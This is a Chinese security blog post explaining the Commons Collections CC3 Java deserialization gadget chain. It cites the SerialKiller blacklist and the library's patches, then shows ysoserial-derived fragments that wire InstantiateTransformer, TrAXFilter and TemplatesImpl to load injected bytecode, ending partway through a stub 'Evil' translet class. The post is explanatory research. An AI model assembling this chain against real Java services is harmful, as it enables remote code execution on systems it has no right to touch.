<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width">
    <link rel="icon" type="image/svg+xml" href="/favicon.svg">
    <link rel="canonical" href="https://shanz0ng.github.io/posts/cc3-deserialization-chain/">
    <meta name="generator" content="Astro v2.10.15">

    <!-- General Meta Tags -->
    <title>CC3 反序列化链</title>
    <meta name="title" content="CC3 反序列化链">
    <meta name="description" content="拆解 Commons Collections CC3 反序列化链，从 CC1 LazyMap 触发段到 TemplatesImpl、TrAXFilter 与 InstantiateTransformer 的执行段。">
    <meta name="author" content="山宗">

    <!-- Open Graph / Facebook -->
    <meta property="og:title" content="CC3 反序列化链">
    <meta property="og:description" content="拆解 Commons Collections CC3 反序列化链，从 CC1 LazyMap 触发段到 TemplatesImpl、TrAXFilter 与 InstantiateTransformer 的执行段。">
    <meta property="og:url" content="https://shanz0ng.github.io/posts/cc3-deserialization-chain/">
    <meta property="og:image" content="https://shanz0ng.github.io/CC3%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%93%BE.png">

    <!-- Twitter -->
    <meta property="twitter:card" content="summary_large_image">
    <meta property="twitter:url" content="https://shanz0ng.github.io/posts/cc3-deserialization-chain/">
    <meta property="twitter:title" content="CC3 反序列化链">
    <meta property="twitter:description" content="拆解 Commons Collections CC3 反序列化链，从 CC1 LazyMap 触发段到 TemplatesImpl、TrAXFilter 与 InstantiateTransformer 的执行段。">
    <meta property="twitter:image" content="https://shanz0ng.github.io/CC3%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%93%BE.png">

    <!-- Google Font -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=IBM+Plex+Mono:ital,wght@0,400;0,500;0,600;0,700;1,400;1,600&display=swap" rel="stylesheet">

    

    <script src="/toggle-theme.js"></script>

  <link rel="stylesheet" href="/assets-built/about.30b904c0.css" />
<link rel="stylesheet" href="/assets-built/about.48d1af8d.css" />
<link rel="stylesheet" href="/assets-built/_slug_.77c27b8f.css" />
<link rel="stylesheet" href="/assets-built/_slug_.8f5bd007.css" />
<link rel="stylesheet" href="/assets-built/_slug_.176043ee.css" />
<link rel="stylesheet" href="/assets-built/_slug_.9526a965.css" /><script type="module" src="/assets-built/hoisted.702e1e21.js"></script></head>
  <body>
    
  <header class="astro-3EF6KSR2">
  <a id="skip-to-content" href="#main-content" class="astro-3EF6KSR2">Skip to content</a>
  <div class="nav-container astro-3EF6KSR2">
    <div class="top-nav-wrap astro-3EF6KSR2">
      <a href="/" class="logo astro-3EF6KSR2">
        山宗的blog
      </a>
      <nav id="nav-menu" class="astro-3EF6KSR2">
        <button class="hamburger-menu focus-outline astro-3EF6KSR2" aria-label="Open Menu" aria-expanded="false" aria-controls="menu-items">
          <div class="icon-container flex astro-3EF6KSR2">
            <div id="first-line" class="astro-3EF6KSR2"></div>
            <div id="second-line" class="astro-3EF6KSR2"></div>
            <div id="third-line" class="astro-3EF6KSR2"></div>
          </div>
        </button>
        <ul id="menu-items" class="display-none sm:flex astro-3EF6KSR2">
          <li class="astro-3EF6KSR2">
            <a href="/posts" class=" astro-3EF6KSR2">
              Posts
            </a>
          </li>
          <li class="astro-3EF6KSR2">
            <a href="/tags" class=" astro-3EF6KSR2">
              Tags
            </a>
          </li>
          <li class="astro-3EF6KSR2">
            <a href="/about" class=" astro-3EF6KSR2">
              About
            </a>
          </li>
          <li class="astro-3EF6KSR2">
            <a type="button" href="/search" tabindex="0" class="group focus-outline p-3 sm:p-1  astro-3EF6KSR2 astro-5EUNQZKT" aria-label="search" title="Search">
  
              <svg xmlns="http://www.w3.org/2000/svg" class="scale-125 sm:scale-100 astro-3EF6KSR2"><path d="M19.023 16.977a35.13 35.13 0 0 1-1.367-1.384c-.372-.378-.596-.653-.596-.653l-2.8-1.337A6.962 6.962 0 0 0 16 9c0-3.859-3.14-7-7-7S2 5.141 2 9s3.14 7 7 7c1.763 0 3.37-.66 4.603-1.739l1.337 2.8s.275.224.653.596c.387.363.896.854 1.384 1.367l1.358 1.392.604.646 2.121-2.121-.646-.604c-.379-.372-.885-.866-1.391-1.36zM9 14c-2.757 0-5-2.243-5-5s2.243-5 5-5 5 2.243 5 5-2.243 5-5 5z" class="astro-3EF6KSR2"></path>
              </svg>
            
</a>
          </li>
          <li class="astro-3EF6KSR2">
            <button id="theme-btn" class="focus-outline astro-3EF6KSR2" title="Toggles light & dark" aria-label="auto" aria-live="polite">
                  <svg xmlns="http://www.w3.org/2000/svg" id="moon-svg" class="astro-3EF6KSR2">
                    <path d="M20.742 13.045a8.088 8.088 0 0 1-2.077.271c-2.135 0-4.14-.83-5.646-2.336a8.025 8.025 0 0 1-2.064-7.723A1 1 0 0 0 9.73 2.034a10.014 10.014 0 0 0-4.489 2.582c-3.898 3.898-3.898 10.243 0 14.143a9.937 9.937 0 0 0 7.072 2.93 9.93 9.93 0 0 0 7.07-2.929 10.007 10.007 0 0 0 2.583-4.491 1.001 1.001 0 0 0-1.224-1.224zm-2.772 4.301a7.947 7.947 0 0 1-5.656 2.343 7.953 7.953 0 0 1-5.658-2.344c-3.118-3.119-3.118-8.195 0-11.314a7.923 7.923 0 0 1 2.06-1.483 10.027 10.027 0 0 0 2.89 7.848 9.972 9.972 0 0 0 7.848 2.891 8.036 8.036 0 0 1-1.484 2.059z" class="astro-3EF6KSR2"></path>
                  </svg>
                  <svg xmlns="http://www.w3.org/2000/svg" id="sun-svg" class="astro-3EF6KSR2">
                    <path d="M6.993 12c0 2.761 2.246 5.007 5.007 5.007s5.007-2.246 5.007-5.007S14.761 6.993 12 6.993 6.993 9.239 6.993 12zM12 8.993c1.658 0 3.007 1.349 3.007 3.007S13.658 15.007 12 15.007 8.993 13.658 8.993 12 10.342 8.993 12 8.993zM10.998 19h2v3h-2zm0-17h2v3h-2zm-9 9h3v2h-3zm17 0h3v2h-3zM4.219 18.363l2.12-2.122 1.415 1.414-2.12 2.122zM16.24 6.344l2.122-2.122 1.414 1.414-2.122 2.122zM6.342 7.759 4.22 5.637l1.415-1.414 2.12 2.122zm13.434 10.605-1.414 1.414-2.122-2.122 1.414-1.414z" class="astro-3EF6KSR2"></path>
                  </svg>
                </button>
          </li>
        </ul>
      </nav>
    </div>
  </div>
  <div class="max-w-3xl mx-auto px-4">
  <hr class="border-skin-line" aria-hidden="true">
</div>
</header>
  <div class="mx-auto flex w-full max-w-3xl justify-start px-2 astro-VJ4TPSPI">
    <button class="focus-outline mt-8 mb-2 flex hover:opacity-75 astro-VJ4TPSPI" onclick="history.back()">
      <svg xmlns="http://www.w3.org/2000/svg" class="astro-VJ4TPSPI"><path d="M13.293 6.293 7.586 12l5.707 5.707 1.414-1.414L10.414 12l4.293-4.293z" class="astro-VJ4TPSPI"></path>
      </svg><span class="astro-VJ4TPSPI">Go back</span>
    </button>
  </div>
  <div class="post-wrapper astro-VJ4TPSPI">
    <main id="main-content" class="astro-VJ4TPSPI">
      <h1 class="post-title astro-VJ4TPSPI">CC3 反序列化链</h1>
      <div class="flex items-center space-x-2 opacity-80 my-2 astro-VJ4TPSPI"><svg xmlns="http://www.w3.org/2000/svg" class="scale-100 inline-block h-6 w-6 fill-skin-base" aria-hidden="true"><path d="M7 11h2v2H7zm0 4h2v2H7zm4-4h2v2h-2zm0 4h2v2h-2zm4-4h2v2h-2zm0 4h2v2h-2z"></path><path d="M5 22h14c1.103 0 2-.897 2-2V6c0-1.103-.897-2-2-2h-2V2h-2v2H9V2H7v2H5c-1.103 0-2 .897-2 2v14c0 1.103.897 2 2 2zM19 8l.001 12H5V8h14z"></path></svg><span class="sr-only">Posted on:</span><span class="italic text-base">2026年7月15日<span aria-hidden="true"> | </span><span class="sr-only"> at </span>08:00</span></div>
      <article id="article" role="article" class="prose mx-auto mt-8 max-w-3xl astro-VJ4TPSPI">
        <h1 id="cc3-反序列化链">CC3 反序列化链</h1>
<p>CC3 可以看成 CC1 LazyMap 链的后半段替换版。前半段仍然复用 CC1 的触发能力，变化点在执行手段和最终落点。</p>
<h2 id="1-修补限制了单步调用能力">1. 修补限制了单步调用能力</h2>
<p>这个变化不是平空出现的，而是发生在 CC1 已经被针对之后。外部防护和组件官方修补，分别从两个位置压缩了 CC1 的可用面。</p>
<p>第一类是第三方过滤器，代表是 <code>SerialKiller</code>。它不是 Apache 官方组件，而是 <code>ikkisoft</code> / Luca Carettoni 维护的反序列化过滤库。它的思路不是理解整条 gadget 链，而是在 <code>ObjectInputStream.resolveClass()</code> 阶段先看“即将被反序列化的类名”，再用黑白名单决定是否放行。这个位置很关键，因为它拦截的不是 <code>readObject()</code> 里的某个具体动作，而是“这个类能不能进入反序列化流”。在早期配置里，它直接把 <code>InvokerTransformer</code> 放进黑名单；后续又把 <code>InstantiateTransformer</code> 也加入进去。</p>
<p>第二类是 Apache Commons Collections 自己的官方修补。<code>3.2.2</code> 发布于 <strong>2015 年 11 月 15 日</strong>，开始对一批 unsafe functor 的序列化与反序列化做默认限制；<code>4.1</code> 则更进一步，直接让这些 unsafe 类不再实现 <code>Serializable</code>。这两步的区别很重要：前者是“类还在，但默认不让它通过序列化边界”，后者是“从类型层面切掉这条入口”。</p>
<p>限制大致落在三个位置：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">SerialKiller 这类过滤器拦的是：</span></span>
<span class="line"><span style="color: #abb2bf">  某个类名能不能进入反序列化流</span></span>
<span class="line"><span style="color: #abb2bf"></span></span>
<span class="line"><span style="color: #abb2bf">Commons Collections 3.2.2 拦的是：</span></span>
<span class="line"><span style="color: #abb2bf">  这些 unsafe functor 能不能继续参与序列化 / 反序列化</span></span>
<span class="line"><span style="color: #abb2bf"></span></span>
<span class="line"><span style="color: #abb2bf">Commons Collections 4.1 拦的是：</span></span>
<span class="line"><span style="color: #abb2bf">  这些 unsafe functor 是否还具备 Serializable 入口</span></span></code></pre>
<p>对 CC1 来说，真正被压缩的是后半段的执行方式：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">InvokerTransformer</span></span>
<span class="line"><span style="color: #abb2bf"> -> Method.invoke()</span></span>
<span class="line"><span style="color: #abb2bf"> -> Runtime.exec()</span></span></code></pre>
<p>也就是说，被重点限制的是“单步方法调用”这一段，而不是整条链里所有组件都失效了。前半段的这些能力并没有同时消失：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">readObject() 仍然能带起调用</span></span>
<span class="line"><span style="color: #abb2bf">LazyMap.get() 仍然能触发 transform()</span></span>
<span class="line"><span style="color: #abb2bf">ChainedTransformer 仍然能串接别的执行组件</span></span></code></pre>
<p>对应出处：</p>
<ul>
<li><a href="https://github.com/ikkisoft/SerialKiller/blob/4a09d4ad03e9e9535656ef7c55f9be0c046082b1/src/main/java/org/nibblesec/tools/SerialKiller.java#L40-L109">SerialKiller.java</a></li>
<li><a href="https://github.com/ikkisoft/SerialKiller/blob/3ce0fe5/config/serialkiller.conf#L5-L15">3ce0fe5 serialkiller.conf</a></li>
<li><a href="https://commons.apache.org/proper/commons-collections/security.html">Apache Commons Collections Security Vulnerabilities</a></li>
<li><a href="https://commons.apache.org/proper/commons-collections/changes.html#Release_3.2.2_%E2%80%93_2015-11-15">Commons Collections 3.2.2 release notes</a></li>
<li><a href="https://commons.apache.org/proper/commons-collections/release_4_1.html">Commons Collections 4.1 release notes</a></li>
</ul>
<h2 id="2-链上还保留着入口触发和串联能力">2. 链上还保留着入口、触发和串联能力</h2>
<p><code>InvokerTransformer</code> 被重点限制之后，链子并没有整体失效。CC3 能成立，靠的是前半段这些能力还在。</p>
<p>ysoserial 的 <code>CommonsCollections3</code> 注释直接说明了这一点：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">Variation on CommonsCollections1 that uses InstantiateTransformer instead of</span></span>
<span class="line"><span style="color: #abb2bf">InvokerTransformer.</span></span></code></pre>
<p>出处：<a href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections3.java#L26-L28">ysoserial CommonsCollections3.java</a></p>
<p>入口本身没有变化，仍然发生在反序列化阶段：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">ObjectInputStream.readObject()</span></span>
<span class="line"><span style="color: #abb2bf"> -> AnnotationInvocationHandler.readObject()</span></span></code></pre>
<p>入口之后的调用过程也基本复用 CC1：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">AnnotationInvocationHandler.readObject()</span></span>
<span class="line"><span style="color: #abb2bf"> -> proxyMap.entrySet()</span></span>
<span class="line"><span style="color: #abb2bf"> -> inner AnnotationInvocationHandler.invoke()</span></span>
<span class="line"><span style="color: #abb2bf"> -> LazyMap.get("entrySet")</span></span>
<span class="line"><span style="color: #abb2bf"> -> ChainedTransformer.transform(...)</span></span></code></pre>
<p>这一段提供了三类能力：</p>
<ul>
<li>入口能力：<code>readObject()</code> 仍然能带起 <code>AnnotationInvocationHandler.readObject()</code></li>
<li>触发能力：<code>Map</code> 调用仍然能被送进 <code>LazyMap.get()</code></li>
<li>串联能力：<code>ChainedTransformer</code> 仍然能继续串联后半段组件</li>
</ul>
<p>参与这一段的主要类是：</p>

























<table><thead><tr><th>类</th><th>作用</th></tr></thead><tbody><tr><td><code>AnnotationInvocationHandler</code></td><td>反序列化时带起 <code>entrySet()</code></td></tr><tr><td><code>Proxy</code> / <code>InvocationHandler</code></td><td>把普通 <code>Map</code> 调用转给内层 handler</td></tr><tr><td><code>LazyMap</code></td><td>在 key 不存在时触发 <code>transform()</code></td></tr><tr><td><code>ChainedTransformer</code></td><td>串接后半段执行组件</td></tr></tbody></table>
<hr>
<h2 id="3-链的后半段缺少继续推进调用的能力">3. 链的后半段缺少继续推进调用的能力</h2>
<p>前半段还能把调用送进 <code>ChainedTransformer</code>，但调用送到这里并不会自己继续往前走。CC1 原来的后半段，依赖的是一组连续的单步方法调用：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">InvokerTransformer("getMethod")</span></span>
<span class="line"><span style="color: #abb2bf"> -> InvokerTransformer("invoke")</span></span>
<span class="line"><span style="color: #abb2bf"> -> InvokerTransformer("exec")</span></span></code></pre>
<p>关键不只是最后落到 <code>Runtime.exec()</code>，而是这组调用本身提供了一种推进能力：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">拿到一个对象</span></span>
<span class="line"><span style="color: #abb2bf"> -> 调它的方法</span></span>
<span class="line"><span style="color: #abb2bf"> -> 取回返回值</span></span>
<span class="line"><span style="color: #abb2bf"> -> 再把返回值交给下一步</span></span></code></pre>
<p><code>InvokerTransformer</code> 被限制之后，链子的缺口就出现在这里。后半段缺少的，不是入口，不是触发，也不是最终落点，而是这种把调用一层层继续往前送的能力。</p>
<hr>
<h2 id="4-可控-bytecode-加载成为新的执行方向">4. 可控 bytecode 加载成为新的执行方向</h2>
<p>单步方法调用这条路被压缩之后，后半段就不能再沿着 <code>Method.invoke() -> Runtime.exec()</code> 继续走了。这时“执行”本身也需要换一种理解方式。</p>
<p>对 Java 来说，代码执行不只有命令执行这一种表现。只要能把可控 bytecode 送进类加载流程，再让 JVM 完成类定义、类初始化或者实例化，外部数据同样会转成执行效果：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">把可控 bytecode 送进某个类</span></span>
<span class="line"><span style="color: #abb2bf"> -> 触发类加载</span></span>
<span class="line"><span style="color: #abb2bf"> -> 触发 defineClass / newInstance</span></span>
<span class="line"><span style="color: #abb2bf"> -> 在类初始化 / 实例化阶段执行代码</span></span></code></pre>
<p>后半段需要补上的能力也就具体了：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">1. 还能接在 Transformer 体系后面</span></span>
<span class="line"><span style="color: #abb2bf">2. 不再依赖 InvokerTransformer 这种单步方法调用</span></span>
<span class="line"><span style="color: #abb2bf">3. 能把调用送到可控 bytecode 的加载位置</span></span></code></pre>
<p>后面关注的重点，也就不再是 <code>Runtime.exec()</code>，而是哪些组件能把调用推进到类加载型落点。</p>
<hr>
<h2 id="5-替代组件开始收敛出来">5. 替代组件开始收敛出来</h2>
<p>执行方向改成类加载之后，后半段要补的其实是三块能力：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">1. 谁把“某个 Class”变成一次构造调用</span></span>
<span class="line"><span style="color: #abb2bf">2. 谁让这次构造调用自带副作用，继续往前推进</span></span>
<span class="line"><span style="color: #abb2bf">3. 谁在后面把这次调用继续串联到 defineClass</span></span></code></pre>
<p>CC3 里的几个关键类，就是沿着这三块能力逐步收敛出来的。</p>
<p><code>InstantiateTransformer</code> 先补上第一块能力。它的核心能力就是调用构造函数：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #E5C07B">Constructor</span><span style="color: #E06C75"> con </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> ((Class) input)</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">getConstructor</span><span style="color: #ABB2BF">(iParamTypes);</span></span>
<span class="line"><span style="color: #C678DD">return</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">con</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">newInstance</span><span style="color: #ABB2BF">(iArgs);</span></span></code></pre>
<p>出处：<code>commons-collections-3.2.1-sources.jar</code> 中的 <code>InstantiateTransformer.java</code></p>
<p>它适合作为 CC3 的第一步，原因很直接：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">它可以把 ChainedTransformer 的输出从“某个 Class”</span></span>
<span class="line"><span style="color: #abb2bf">直接变成“调用这个类的构造函数”</span></span></code></pre>
<p>但只会“调用构造函数”还不够。还需要这个构造函数本身带着可继续推进的副作用，否则调用会停在这里。</p>
<p>第二块能力落在 <code>TrAXFilter</code> 上。<code>InstantiateTransformer</code> 只能负责调用构造函数，还需要一个“构造函数本身有副作用”的类。</p>
<p>它的构造函数如下：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #C678DD">public</span><span style="color: #E06C75"> </span><span style="color: #61AFEF">TrAXFilter</span><span style="color: #E06C75">(</span><span style="color: #E5C07B">Templates</span><span style="color: #E06C75"> templates) throws TransformerConfigurationException {</span></span>
<span class="line"><span style="color: #E06C75">    _templates </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> templates</span><span style="color: #ABB2BF">;</span></span>
<span class="line"><span style="color: #E06C75">    _transformer </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> (TransformerImpl) </span><span style="color: #E5C07B">templates</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">newTransformer</span><span style="color: #ABB2BF">();</span></span>
<span class="line"><span style="color: #E06C75">    _transformerHandler </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> </span><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #61AFEF">TransformerHandlerImpl</span><span style="color: #E06C75">(_transformer)</span><span style="color: #ABB2BF">;</span></span>
<span class="line"><span style="color: #E06C75">    _overrideDefaultParser </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">_transformer</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">overrideDefaultParser</span><span style="color: #ABB2BF">();</span></span>
<span class="line"><span style="color: #E06C75">}</span></span></code></pre>
<p>源码链接：<a href="https://github.com/JetBrains/jdk8u_jaxp/blob/master/src/com/sun/org/apache/xalan/internal/xsltc/trax/TrAXFilter.java#L581-L595">TrAXFilter.java</a></p>
<p>在 CC3 里，这一段可以组装成：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #61AFEF">ConstantTransformer</span><span style="color: #E06C75">(</span><span style="color: #E5C07B">TrAXFilter</span><span style="color: #ABB2BF">.</span><span style="color: #E5C07B">class</span><span style="color: #E06C75">)</span><span style="color: #ABB2BF">,</span></span>
<span class="line"><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #61AFEF">InstantiateTransformer</span><span style="color: #E06C75">(</span></span>
<span class="line"><span style="color: #E06C75">    </span><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">Class</span><span style="color: #E06C75">[]{</span><span style="color: #E5C07B">Templates</span><span style="color: #ABB2BF">.</span><span style="color: #E5C07B">class</span><span style="color: #E06C75">}</span><span style="color: #ABB2BF">,</span></span>
<span class="line"><span style="color: #E06C75">    </span><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">Object</span><span style="color: #E06C75">[]{templatesInstance}</span></span>
<span class="line"><span style="color: #E06C75">)</span></span></code></pre>
<p>等价于：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #61AFEF">TrAXFilter</span><span style="color: #E06C75">(templatesInstance)</span></span></code></pre>
<p>调用会继续进入：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">new TrAXFilter(templatesInstance)</span></span>
<span class="line"><span style="color: #abb2bf"> -> templatesInstance.newTransformer()</span></span></code></pre>
<p><code>InstantiateTransformer</code> 和 <code>TrAXFilter</code> 配合之后，调用已经到了 <code>templatesInstance.newTransformer()</code>。第三块能力就落在 <code>TemplatesImpl</code> 上了。<code>TemplatesImpl</code> 是 Xalan 中保存和加载 translet 的类。正常情况下，它保存的是 XSLT 编译后的 bytecode，后续通过 <code>newTransformer()</code> 加载并实例化。</p>
<p>CC3 借用的，正是它在 <code>newTransformer()</code> 过程中定义并实例化 translet 类的能力。</p>
<p>要让 <code>templatesInstance.newTransformer()</code> 继续走到类定义，这个对象至少要具备三块状态：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #E5C07B">TemplatesImpl</span><span style="color: #E06C75"> templatesInstance </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> </span><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #61AFEF">TemplatesImpl</span><span style="color: #E06C75">()</span><span style="color: #ABB2BF">;</span></span>
<span class="line"></span>
<span class="line"><span style="color: #61AFEF">setField</span><span style="color: #E06C75">(templatesInstance</span><span style="color: #ABB2BF">,</span><span style="color: #E06C75"> </span><span style="color: #98C379">"_name"</span><span style="color: #ABB2BF">,</span><span style="color: #E06C75"> </span><span style="color: #98C379">"cc3"</span><span style="color: #E06C75">)</span><span style="color: #ABB2BF">;</span></span>
<span class="line"><span style="color: #61AFEF">setField</span><span style="color: #E06C75">(templatesInstance</span><span style="color: #ABB2BF">,</span><span style="color: #E06C75"> </span><span style="color: #98C379">"_bytecodes"</span><span style="color: #ABB2BF">,</span><span style="color: #E06C75"> </span><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #C678DD">byte</span><span style="color: #E06C75">[][]{classBytes})</span><span style="color: #ABB2BF">;</span></span>
<span class="line"><span style="color: #61AFEF">setField</span><span style="color: #E06C75">(templatesInstance</span><span style="color: #ABB2BF">,</span><span style="color: #E06C75"> </span><span style="color: #98C379">"_tfactory"</span><span style="color: #ABB2BF">,</span><span style="color: #E06C75"> </span><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #61AFEF">TransformerFactoryImpl</span><span style="color: #E06C75">())</span><span style="color: #ABB2BF">;</span></span></code></pre>
<p>ysoserial 中的对应代码：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #C678DD">final</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">T</span><span style="color: #E06C75"> templates </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">tplClass</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">newInstance</span><span style="color: #ABB2BF">();</span></span>
<span class="line"></span>
<span class="line"><span style="color: #C678DD">final</span><span style="color: #E06C75"> </span><span style="color: #C678DD">byte</span><span style="color: #E06C75">[] classBytes </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">clazz</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">toBytecode</span><span style="color: #ABB2BF">();</span></span>
<span class="line"></span>
<span class="line"><span style="color: #E5C07B">Reflections</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">setFieldValue</span><span style="color: #ABB2BF">(templates, </span><span style="color: #98C379">"_bytecodes"</span><span style="color: #ABB2BF">, </span><span style="color: #C678DD">new</span><span style="color: #ABB2BF"> </span><span style="color: #C678DD">byte</span><span style="color: #ABB2BF">[][] {</span></span>
<span class="line"><span style="color: #ABB2BF">    classBytes, </span><span style="color: #E5C07B">ClassFiles</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">classAsBytes</span><span style="color: #ABB2BF">(</span><span style="color: #E5C07B">Foo</span><span style="color: #ABB2BF">.</span><span style="color: #E5C07B">class</span><span style="color: #ABB2BF">)</span></span>
<span class="line"><span style="color: #ABB2BF">});</span></span>
<span class="line"></span>
<span class="line"><span style="color: #E5C07B">Reflections</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">setFieldValue</span><span style="color: #ABB2BF">(templates, </span><span style="color: #98C379">"_name"</span><span style="color: #ABB2BF">, </span><span style="color: #98C379">"Pwnr"</span><span style="color: #ABB2BF">);</span></span>
<span class="line"><span style="color: #E5C07B">Reflections</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">setFieldValue</span><span style="color: #ABB2BF">(templates, </span><span style="color: #98C379">"_tfactory"</span><span style="color: #ABB2BF">, </span><span style="color: #E5C07B">transFactory</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">newInstance</span><span style="color: #ABB2BF">());</span></span>
<span class="line"><span style="color: #C678DD">return</span><span style="color: #E06C75"> templates</span><span style="color: #ABB2BF">;</span></span></code></pre>
<p>出处：<code>C:\Project\HackTools\ysoserial\src\main\java\ysoserial\payloads\util\Gadgets.java</code></p>
<p>三个字段分别负责：</p>





















<table><thead><tr><th>字段</th><th>作用</th></tr></thead><tbody><tr><td><code>_bytecodes</code></td><td>保存待加载的 translet class bytes</td></tr><tr><td><code>_name</code></td><td>让 <code>TemplatesImpl</code> 处于可用模板状态</td></tr><tr><td><code>_tfactory</code></td><td>提供 transformer 和类加载所需的工厂上下文</td></tr></tbody></table>
<p>作为 <code>_bytecodes</code> 放进去的类，通常还需要继承 <code>AbstractTranslet</code>：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #C678DD">public</span><span style="color: #E06C75"> </span><span style="color: #C678DD">class</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">Evil</span><span style="color: #E06C75"> </span><span style="color: #C678DD">extends</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">AbstractTranslet</span><span style="color: #E06C75"> </span><span style="color: #ABB2BF">{</span></span>
<span class="line"><span style="color: #E06C75">    </span><span style="color: #C678DD">static</span><span style="color: #E06C75"> {</span></span>
<span class="line"><span style="color: #E06C75">        </span><span style="color: #7F848E; font-style: italic">// class initialization side effect</span></span>
<span class="line"><span style="color: #E06C75">    }</span></span>
<span class="line"></span>
